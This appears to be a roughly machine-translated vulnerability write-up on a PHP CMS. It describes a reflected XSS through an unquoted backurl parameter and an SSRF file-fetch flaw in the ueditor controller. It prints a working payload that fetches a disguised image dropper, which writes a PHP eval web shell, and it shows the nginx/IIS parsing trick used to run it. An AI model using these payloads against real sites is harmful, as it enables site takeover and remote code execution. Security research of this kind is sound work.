XSS
Path: /plugins/template/login.php
urlvalues:
$url =conf('runmode')==1 ? $path.'index.php?location=user&backurl='.$backurl.'&act=' : $path.'?location=user&backurl='.$backurl.'&act=' ;
Here $backurlis our controllable:
$backurl=getform('backurl','get');
Also note that there hrefis no double quotation marks parcels $url, which leads us to be able to just use a space separating property, we want to construct a property, you can F12look at the source:
the purpose we want to achieve:
<a href=/?location=user&backurl=test onmouseover=javascript:alert(1111) test=&act=login>
$backurl=test onmouseover=javascript:alert(1111) test=
Bomb Box Success:
ssrf + middleware resolve
Vulnerability file:
/plugins/ueditor/php/controller.php
The vulnerable code:
you can see this section for receiving user input url, in addition to two parameters:
the user input upfolderparameters, to upload files path, in addition actionto ascatchimage
We controlled two parameters that actionand upfolderlook at what these two parameters specific filter measures:
-
safeword():
Function filtering the other symbols, letters and numbers reserved only -
safe_url():
Here Duiurlretain the input ofurlthea-zA-Z0-9,.:=@?_\/\s]
Then look at the function to transfer files down_url(),
look at the focus of the urlfiltering function does not filter the ip and domain name, in addition to the file name and file extension from our input url, save the file does not rename, just ask the file extension can not be empty , as well as file suffix must be in the white list, take a look conf()
you can see that we can not see a legal file extension, but you can see and controller.phpthere is the same directory config.jsonfile, which has a:
"fileAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"],
Simply looked dangerous file extension are filtered out, then create an image directly Trojans (although means very old), the contents of the file: <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>, Trojans into making good on its own server, and then access contorller.phpsending a request,
which time and then visit:http://www.gohosts.com/upload/file/2.jpg/.php
Then you can /upload/filesee the next path generates a shell.php
view shell.php:
you can see written shellsuccessfully. Here to take advantage of the nginx <8.03 and IIS 7.0 / 7.5 middleware parsing vulnerability.
